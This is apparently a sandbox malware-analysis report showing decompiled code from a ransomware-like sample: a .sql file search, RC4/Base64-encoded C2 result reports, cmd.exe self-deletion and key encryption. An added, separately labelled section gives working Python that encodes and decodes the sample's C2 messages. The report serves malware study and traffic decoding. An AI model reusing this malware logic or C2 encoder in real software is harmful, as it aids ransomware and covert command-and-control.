                                        0x0fc66b6e
                                        0x0fc66b74
                                        0x0fc66b7e
                                        0x0fc66b7e
                                        0x0fc66b89
                                        0x0fc66b89
                                        0x0fc66b8f
                                        0x0fc66b8f
                                        0x0fc66b93
                                        0x0fc66b99
                                        0x0fc66b9e
                                        0x0fc66baa
                                        0x0fc66baf
                                        0x00000000
                                        0x0fc66baf
                                        0x0fc66b9e
                                        0x0fc66afe
                                        0x0fc66aee
                                        0x0fc66ad9
                                        0x00000000
                                        0x0fc66bb2
                                        0x0fc66bc2
                                        0x0fc66bcd
                                        0x0fc66bdb

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66A52
                                        • lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66A64
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66A72
                                        • lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66A9C
                                        • lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66AB2
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC66AC4
                                        • lstrlenW.KERNEL32(00000000,?,?), ref: 0FC66ACB
                                        • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FC66AFA
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FC66B11
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FC66B1C
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FC66B3A
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FC66B4F
                                        • lstrlenA.KERNEL32(*******************,?,?), ref: 0FC66B6E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FC66B89
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0FC66B93
                                        • FindNextFileW.KERNEL32(?,?,?,?), ref: 0FC66BBC
                                        • FindClose.KERNEL32(?,?,?), ref: 0FC66BCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                        • String ID: *******************$.sql
                                        • API String ID: 3616287438-58436570
                                        • Opcode ID: f1d5b3f461bc443fba13900eed3315c664bf7c207916a93e065b89a4d1bfb2f3
                                        • Instruction ID: 7d7ce6bf5b5ee2fa1681e6465f46bddf48963fe31a720c6db872f707ed0f5404
                                        • Opcode Fuzzy Hash: f1d5b3f461bc443fba13900eed3315c664bf7c207916a93e065b89a4d1bfb2f3
                                        • Instruction Fuzzy Hash: 5A418671608216EBDB109F659C8BFAE76ACEF44711F404069FA02F6141EB74AA11DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 51%
                                        			E0FC65670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				BYTE* _v8;
                                        				void* _v12;
                                        				void* _v16;
                                        				int _v20;
                                        				char _v22;
                                        				short _v24;
                                        				short _v28;
                                        				char _v36;
                                        				char _v180;
                                        				char _v435;
                                        				char _v436;
                                        				WCHAR* _t40;
                                        				signed int _t48;
                                        				int _t60;
                                        				void* _t61;
                                        				char _t68;
                                        				CHAR* _t71;
                                        				void* _t74;
                                        				short _t79;
                                        				short _t80;
                                        				char _t81;
                                        				BYTE* _t84;
                                        				WCHAR* _t92;
                                        				signed int _t93;
                                        				char* _t95;
                                        				void* _t96;
                                        				int _t98;
                                        				long _t99;
                                        				void* _t100;
                                        
                                        				_t88 = __edx;
                                        				_t74 = __ecx;
                                        				_t96 = __edx;
                                        				_v12 = __ecx;
                                        				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                        				_v16 = _t40;
                                        				if(_t40 == 0) {
                                        					_t92 = 0;
                                        					_t71 = 0;
                                        				} else {
                                        					_t3 =  &(_t40[0x400]); // 0x800
                                        					_t71 = _t3;
                                        					_t92 = _t40;
                                        				}
                                        				_push(_t96);
                                        				_v8 = _t92;
                                        				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				_push(0);
                                        				_push(_t74);
                                        				_push(0);
                                        				E0FC639F0( &_v180);
                                        				E0FC67330( &_v180, _t88);
                                        				E0FC67140( &_v180);
                                        				E0FC66F40( &_v180,  &(_t92[lstrlenW(_t92)]));
                                        				_t48 = lstrlenW(_t92);
                                        				_t79 = "#shasj"; // 0x61687323
                                        				_t93 = _t48;
                                        				asm("movq xmm0, [0xfc6fc78]");
                                        				_v28 = _t79;
                                        				_t80 =  *0xfc6fc84; // 0x6a73
                                        				_v24 = _t80;
                                        				_t81 =  *0xfc6fc86; // 0x0
                                        				asm("movq [ebp-0x20], xmm0");
                                        				_v22 = _t81;
                                        				_v436 = 0;
                                        				E0FC69010( &_v435, 0, 0xff);
                                        				E0FC65D70( &_v436,  &_v36, lstrlenA( &_v36));
                                        				_t98 = _t93 + _t93;
                                        				E0FC65E20( &_v436, _v8, _t98);
                                        				_v20 = _t93 * 8;
                                        				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
                                        					GetLastError();
                                        				}
                                        				_t29 = lstrlenA(_t71) + 4; // 0x4
                                        				_t99 = _t29;
                                        				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
                                        				_t60 = lstrlenA(_t71);
                                        				_t84 = _v12;
                                        				_t61 = _t60 + 2;
                                        				if(_t84 == 0) {
                                        					L7:
                                        					_v8 = 0;
                                        				} else {
                                        					_v8 = _t84;
                                        					if(_t61 >= _t99) {
                                        						goto L7;
                                        					}
                                        				}
                                        				_t100 = 0;
                                        				if(lstrlenA(_t71) != 0) {
                                        					_t95 = _v8;
                                        					do {
                                        						_t68 =  *((intOrPtr*)(_t100 + _t71));
                                        						if(_t68 != 0xa && _t68 != 0xd) {
                                        							 *_t95 = _t68;
                                        							_t95 = _t95 + 1;
                                        						}
                                        						_t100 = _t100 + 1;
                                        					} while (_t100 < lstrlenA(_t71));
                                        				}
                                        				E0FC654A0(_v8, 0, 0);
                                        				_t73 =  !=  ? 1 : 0;
                                        				VirtualFree(_v12, 0, 0x8000);
                                        				E0FC67C10( &_v180);
                                        				VirtualFree(_v16, 0, 0x8000);
                                        				_t67 =  !=  ? 1 : 0;
                                        				return  !=  ? 1 : 0;
                                        			}

                                        0x0fc65670
                                        0x0fc65670
                                        0x0fc6568a
                                        0x0fc6568c
                                        0x0fc6568f
                                        0x0fc65695
                                        0x0fc6569a
                                        0x0fc656a6
                                        0x0fc656a8
                                        0x0fc6569c
                                        0x0fc6569c
                                        0x0fc6569c
                                        0x0fc656a2
                                        0x0fc656a2
                                        0x0fc656aa
                                        0x0fc656ae
                                        0x0fc656bd
                                        0x0fc656c6
                                        0x0fc656c8
                                        0x0fc656c9
                                        0x0fc656ce
                                        0x0fc656d0
                                        0x0fc656d1
                                        0x0fc656d3
                                        0x0fc656d4
                                        0x0fc656d6
                                        0x0fc656d7
                                        0x0fc656d9
                                        0x0fc656da
                                        0x0fc656df
                                        0x0fc656e1
                                        0x0fc656e2
                                        0x0fc656ea
                                        0x0fc656f5
                                        0x0fc65700
                                        0x0fc65718
                                        0x0fc6571e
                                        0x0fc65720
                                        0x0fc65726
                                        0x0fc65728
                                        0x0fc65736
                                        0x0fc65739
                                        0x0fc65745
                                        0x0fc65749
                                        0x0fc65752
                                        0x0fc65757
                                        0x0fc6575a
                                        0x0fc65761
                                        0x0fc6577d
                                        0x0fc65785
                                        0x0fc65792
                                        0x0fc657a1
                                        0x0fc657ba
                                        0x0fc657bc
                                        0x0fc657bc
                                        0x0fc657d2
                                        0x0fc657d2
                                        0x0fc657df
                                        0x0fc657e2
                                        0x0fc657e4
                                        0x0fc657e7
                                        0x0fc657ec
                                        0x0fc657f5
                                        0x0fc657f5
                                        0x0fc657ee
                                        0x0fc657ee
                                        0x0fc657f3
                                        0x00000000
                                        0x00000000
                                        0x0fc657f3
                                        0x0fc657fd
                                        0x0fc65803
                                        0x0fc65805
                                        0x0fc65808
                                        0x0fc65808
                                        0x0fc6580d
                                        0x0fc65813
                                        0x0fc65815
                                        0x0fc65815
                                        0x0fc65817
                                        0x0fc6581e
                                        0x0fc65808
                                        0x0fc65829
                                        0x0fc65843
                                        0x0fc65850
                                        0x0fc65858
                                        0x0fc65867
                                        0x0fc6586b
                                        0x0fc65871

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0FC6568F
                                        • wsprintfW.USER32 ref: 0FC656BD
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FC6570C
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0FC6571E
                                        • _memset.LIBCMT ref: 0FC65761
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0FC6576D
                                        • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 0FC657B2
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657BC
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657C9
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657D8
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657E2
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657FF
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC65818
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC65850
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC65867
                                        Strings
                                        • #shasj, xrefs: 0FC65720
                                        • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FC656B7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                        • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                        • API String ID: 2994799111-4131875188
                                        • Opcode ID: dde2b428210391c5ab5bd8fc7eff36544519c1f0e260d2019b05f46e1f58f27a
                                        • Instruction ID: 4fcbdb20bdf15d6a47c4ef7e20d4c99dea919ac9b9cc8be2d5c431b7d1582c52
                                        • Opcode Fuzzy Hash: dde2b428210391c5ab5bd8fc7eff36544519c1f0e260d2019b05f46e1f58f27a
                                        • Instruction Fuzzy Hash: E951E471908219BBEB20DB65DC86FEE7B79EF44300F140068EA05B7181EB746A14CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%
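Added example (not code from the Joe Sandbox report and not the sample's own code): a Python re-creation of the C2 message pipeline that E0FC65670 above implements and that the first half of E0FC65210 in the next listing (the part before the int3 padding, which marks a separate routine the decompiler fused onto it) reverses. E0FC65670 formats the wide string "action=result&e_files=%d&e_size=%I64u&e_time=%d&" (from the report's Strings), passes it through E0FC65D70/E0FC65E20 with a key string ending in "#shasj", Base64-encodes the result with CryptBinaryToStringA flags 0x40000001 (CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF) and then strips any remaining 0x0A/0x0D bytes before handing the buffer to E0FC654A0. E0FC65210 does CryptStringToBinaryA with flag 1 (CRYPT_STRING_BASE64) and the same E0FC65D70/E0FC65E20 pair. That those two helpers are an RC4 key schedule and keystream is an inference from the 256-byte state (_v436 / _v292) initialised from a NUL-terminated key, not something the report states. The leading 8 bytes of the key are loaded from 0x0fc6fc78 and do not appear on the page, so the key below is a placeholder to be replaced from the memory dump.

```python
"""Added example: encode/decode of the GandCrab-style C2 report body seen in
E0FC65670 (encode) and E0FC65210 (decode). Not code from the report/sample."""
import base64

# ASSUMPTION: only the trailing "#shasj" of the key string is visible in the
# listing; the first 8 bytes come from 0x0fc6fc78 and are not on the page.
# Replace this placeholder with the bytes read from the memory dump.
PLACEHOLDER_KEY = b"????????#shasj"

# Format string taken from the report's Strings section for E0FC65670.
REPORT_FMT = "action=result&e_files={}&e_size={}&e_time={}&"


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key schedule plus keystream XOR; the same call decrypts.

    Inference: the 256-byte state buffer filled by E0FC65D70 and consumed by
    E0FC65E20 has the RC4 KSA/PRGA shape.
    """
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_result_report(e_files: int, e_size: int, e_time: int) -> str:
    """Equivalent of the wsprintfW call (%d, %I64u, %d are plain decimals)."""
    return REPORT_FMT.format(e_files, e_size, e_time)


def encode_c2_message(plain: str, key: bytes = PLACEHOLDER_KEY) -> str:
    """Wide string -> RC4 -> Base64 without CR/LF, as E0FC65670 does."""
    # wsprintfW produces UTF-16LE; the sample encrypts lstrlenW(s) * 2 bytes,
    # i.e. the characters without the terminating NUL.
    raw = plain.encode("utf-16-le")
    b64 = base64.b64encode(rc4(key, raw)).decode("ascii")
    # CryptBinaryToStringA flags 0x40000001 = CRYPT_STRING_BASE64 |
    # CRYPT_STRING_NOCRLF; the sample still loops to drop any 0x0A / 0x0D.
    return b64.replace("\r", "").replace("\n", "")


def decode_c2_message(b64: str, key: bytes = PLACEHOLDER_KEY) -> bytes:
    """Base64 (CryptStringToBinaryA flag 1 = CRYPT_STRING_BASE64) -> RC4.

    Returns raw bytes: the listing does not show whether the C2 reply is
    narrow or wide text, so the caller chooses the text decoding.
    """
    return rc4(key, base64.b64decode(b64))


def parse_report(text: str) -> dict:
    """Split a key=value&... body back into fields (trailing '&' tolerated)."""
    return dict(kv.split("=", 1) for kv in text.split("&") if "=" in kv)


if __name__ == "__main__":
    # Constructed sample values, not data from the analysis run.
    msg = build_result_report(3, 1048576, 42)
    wire = encode_c2_message(msg)
    print(wire)
    print(parse_report(decode_c2_message(wire).decode("utf-16-le")))
```

To unpack a real POST body from a capture of this sample, set PLACEHOLDER_KEY to the full key string recovered from the dump, call decode_c2_message on the body and decode the result as UTF-16LE; an RC4 identification can be checked against the standard vector Key="Key", Plaintext="Plaintext" -> BBF316E8D940AF0AD3 before trusting the key.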

                                        C-Code - Quality: 73%
                                        			E0FC65210(CHAR* __ecx, CHAR** __edx) {
                                        				int _v8;
                                        				long _v12;
                                        				char _v14;
                                        				void* _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				char _v28;
                                        				CHAR** _v32;
                                        				void* _v36;
                                        				char _v291;
                                        				char _v292;
                                        				void* _v348;
                                        				void* _v352;
                                        				int _t43;
                                        				BYTE* _t44;
                                        				int _t46;
                                        				void* _t50;
                                        				void* _t51;
                                        				char _t52;
                                        				void* _t64;
                                        				signed int _t66;
                                        				signed int _t68;
                                        				int _t69;
                                        				int _t72;
                                        				char _t74;
                                        				intOrPtr _t75;
                                        				CHAR* _t84;
                                        				char* _t86;
                                        				void* _t88;
                                        				signed char _t89;
                                        				WCHAR* _t94;
                                        				CHAR* _t95;
                                        				BYTE* _t101;
                                        				WCHAR* _t102;
                                        				WCHAR* _t103;
                                        				void* _t104;
                                        				long _t105;
                                        				long _t106;
                                        				int _t107;
                                        				void* _t108;
                                        				CHAR* _t109;
                                        				void* _t110;
                                        
                                        				_t86 = __ecx;
                                        				_v32 = __edx;
                                        				_t43 = lstrlenA(__ecx) + 1;
                                        				_v8 = _t43;
                                        				_t3 = _t43 + 1; // 0x2
                                        				_t105 = _t3;
                                        				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
                                        				_v36 = _t44;
                                        				if(_t44 == 0 || _v8 >= _t105) {
                                        					_t101 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t101 = _t44;
                                        				}
                                        				_t106 = 0;
                                        				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
                                        				_t119 = _t46;
                                        				if(_t46 == 0) {
                                        					GetLastError();
                                        					goto L14;
                                        				} else {
                                        					_t50 = "#shasj"; // 0x61687323
                                        					asm("movq xmm0, [0xfc6fc78]");
                                        					_t107 = _v8;
                                        					_v20 = _t50;
                                        					_t51 =  *0xfc6fc84; // 0x6a73
                                        					_v16 = _t51;
                                        					_t52 =  *0xfc6fc86; // 0x0
                                        					_v14 = _t52;
                                        					asm("movq [ebp-0x18], xmm0");
                                        					_v292 = 0;
                                        					E0FC69010( &_v291, 0, 0xff);
                                        					E0FC65D70( &_v292,  &_v28, lstrlenA( &_v28));
                                        					E0FC65E20( &_v292, _t101, _t107);
                                        					_t94 =  &_v28;
                                        					asm("xorps xmm0, xmm0");
                                        					asm("movdqu [ebp-0x18], xmm0");
                                        					E0FC633E0(_t94, _t119, _t101);
                                        					if(_v28 != 0) {
                                        						E0FC65190();
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						asm("int3");
                                        						_push(lstrlenA);
                                        						_push(_t107);
                                        						_push(_t101);
                                        						_t102 = _t94;
                                        						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                        						_v352 = _t108;
                                        						GetModuleFileNameW(0, _t108, 0x200);
                                        						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
                                        						_v348 = _t88;
                                        						__eflags = _t88 - 0xffffffff;
                                        						if(_t88 != 0xffffffff) {
                                        							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
                                        							_v28 = _t64;
                                        							__eflags = _t64;
                                        							if(_t64 != 0) {
                                        								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
                                        								_v16 = _t66;
                                        								__eflags = _t66;
                                        								if(_t66 != 0) {
                                        									_t29 = _t66 + 0x4e; // 0x4e
                                        									_t109 = _t29;
                                        									_v12 = _t109;
                                        									_t68 = lstrlenW(_t102);
                                        									_t89 = 0;
                                        									_t103 =  &(_t102[_t68]);
                                        									_t69 = lstrlenA(_t109);
                                        									__eflags = _t69 + _t69;
                                        									if(_t69 + _t69 != 0) {
                                        										_t95 = _t109;
                                        										do {
                                        											__eflags = _t89 & 0x00000001;
                                        											if((_t89 & 0x00000001) != 0) {
                                        												 *((char*)(_t103 + _t89)) = 0;
                                        											} else {
                                        												_t74 =  *_t109;
                                        												_t109 =  &(_t109[1]);
                                        												 *((char*)(_t103 + _t89)) = _t74;
                                        											}
                                        											_t89 = _t89 + 1;
                                        											_t72 = lstrlenA(_t95);
                                        											_t95 = _v12;
                                        											__eflags = _t89 - _t72 + _t72;
                                        										} while (_t89 < _t72 + _t72);
                                        									}
                                        									UnmapViewOfFile(_v16);
                                        									_t88 = _v20;
                                        									_t108 = _v24;
                                        								}
                                        								CloseHandle(_v28);
                                        							}
                                        							CloseHandle(_t88);
                                        						}
                                        						return VirtualFree(_t108, 0, 0x8000);
                                        					} else {
                                        						_t104 = _v24;
                                        						_t75 =  *0xfc72a60; // 0x0
                                        						_t110 = _v20;
                                        						_t76 =  !=  ? 0 : _t75;
                                        						_v12 = 1;
                                        						 *0xfc72a60 =  !=  ? 0 : _t75;
                                        						if(_t110 != 0) {
                                        							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
                                        							 *_v32 = _t84;
                                        							if(_t84 != 0) {
                                        								lstrcpyA(_t84, _t110);
                                        							}
                                        						}
                                        						_t77 = GetProcessHeap;
                                        						if(_t104 != 0) {
                                        							HeapFree(GetProcessHeap(), 0, _t104);
                                        							_t77 = GetProcessHeap;
                                        						}
                                        						if(_t110 != 0) {
                                        							HeapFree( *_t77(), 0, _t110);
                                        						}
                                        						_t106 = _v12;
                                        						L14:
                                        						VirtualFree(_v36, 0, 0x8000);
                                        						return _t106;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • lstrlenA.KERNEL32(?,00000001,?,?), ref: 0FC65222
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FC65239
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FC6525E
                                        • _memset.LIBCMT ref: 0FC652AB
                                        • lstrlenA.KERNEL32(?), ref: 0FC652BD
                                        • lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0FC65324
                                        • VirtualAlloc.KERNEL32(00000000,00000001), ref: 0FC6532A
                                        • lstrcpyA.KERNEL32(00000000,?), ref: 0FC6533B
                                        • HeapFree.KERNEL32(00000000), ref: 0FC65356
                                        • HeapFree.KERNEL32(00000000), ref: 0FC65367
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65376
                                        • GetLastError.KERNEL32 ref: 0FC65385
                                          • Part of subcall function 0FC65190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FC65392,00000000), ref: 0FC651A6
                                          • Part of subcall function 0FC65190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC651B8
                                          • Part of subcall function 0FC65190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FC651C8
                                          • Part of subcall function 0FC65190: wsprintfW.USER32 ref: 0FC651D9
                                          • Part of subcall function 0FC65190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FC651F3
                                          • Part of subcall function 0FC65190: ExitProcess.KERNEL32 ref: 0FC651FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
                                        • String ID: #shasj
                                        • API String ID: 834684195-2423951532
                                        • Opcode ID: 0c3cc4eb0e87f7997819e6cb2728155bc04038f3528bba2e5744c4c323a0da47
                                        • Instruction ID: 798d779e5576aa5559dbbae316e236aa952f16ef2bfa1746325060b710f34c12
                                        • Opcode Fuzzy Hash: 0c3cc4eb0e87f7997819e6cb2728155bc04038f3528bba2e5744c4c323a0da47
                                        • Instruction Fuzzy Hash: 7A41B77190821AEFDB109FA5DC86BEFBB78EF48711F140515EA05F7281DB789A50CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E0FC66530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
                                        				long* _v8;
                                        				long* _v12;
                                        				int _v16;
                                        				char _v20;
                                        				long _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				long** _t26;
                                        				char* _t31;
                                        				int _t33;
                                        				long _t36;
                                        
                                        				EnterCriticalSection(0xfc72a48);
                                        				_v8 = 0;
                                        				_v12 = 0;
                                        				_t26 =  &_v8;
                                        				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                        				if(_t26 != 0) {
                                        					L6:
                                        					_v16 = 0;
                                        					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
                                        						_v20 = 0xa;
                                        						_t31 =  &_v20;
                                        						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
                                        						_v32 = _t31;
                                        						 *_a16 = 0xc8;
                                        						_t33 = _a12;
                                        						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
                                        						_v16 = _t33;
                                        						_v24 = GetLastError();
                                        						if(_v16 == 0) {
                                        							E0FC634F0(_t34);
                                        						}
                                        					}
                                        					CryptReleaseContext(_v8, 0);
                                        					LeaveCriticalSection(0xfc72a48);
                                        					return _v16;
                                        				}
                                        				_t36 = GetLastError();
                                        				if(_t36 != 0x80090016) {
                                        					return 0;
                                        				}
                                        				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                        				if(_t36 != 0) {
                                        					goto L6;
                                        				}
                                        				return 0;
                                        			}

                                        APIs
                                        • EnterCriticalSection.KERNEL32(0FC72A48,?,0FC63724,00000000,00000000,00000000,?,00000800), ref: 0FC6653B
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FC63724,00000000,00000000,00000000), ref: 0FC6655E
                                        • GetLastError.KERNEL32(?,0FC63724,00000000,00000000,00000000), ref: 0FC66568
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC63724,00000000,00000000,00000000), ref: 0FC66584
                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FC63724,00000000,00000000), ref: 0FC665B9
                                        • CryptGetKeyParam.ADVAPI32(00000000,00000008,0FC63724,0000000A,00000000,?,0FC63724,00000000), ref: 0FC665DA
                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FC63724,?,0FC63724,00000000), ref: 0FC66602
                                        • GetLastError.KERNEL32(?,0FC63724,00000000), ref: 0FC6660B
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FC63724,00000000,00000000), ref: 0FC66628
                                        • LeaveCriticalSection.KERNEL32(0FC72A48,?,0FC63724,00000000,00000000), ref: 0FC66633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 72144047-1948191093
                                        • Opcode ID: 8384f7902b5e4344987a7865998a47544679e1d50ebac90a47595b6658965b03
                                        • Instruction ID: 0f3e0c91069e60dbaae3cfdfae7653077503f25f1927d2b06ffe360e04cf3201
                                        • Opcode Fuzzy Hash: 8384f7902b5e4344987a7865998a47544679e1d50ebac90a47595b6658965b03
                                        • Instruction Fuzzy Hash: AE314575A5830ABBDB10DFA1DD87FDE77B8AB48701F104158F602BA180D779A610DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0FC66C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                        				void* _v12;
                                        				intOrPtr _v16;
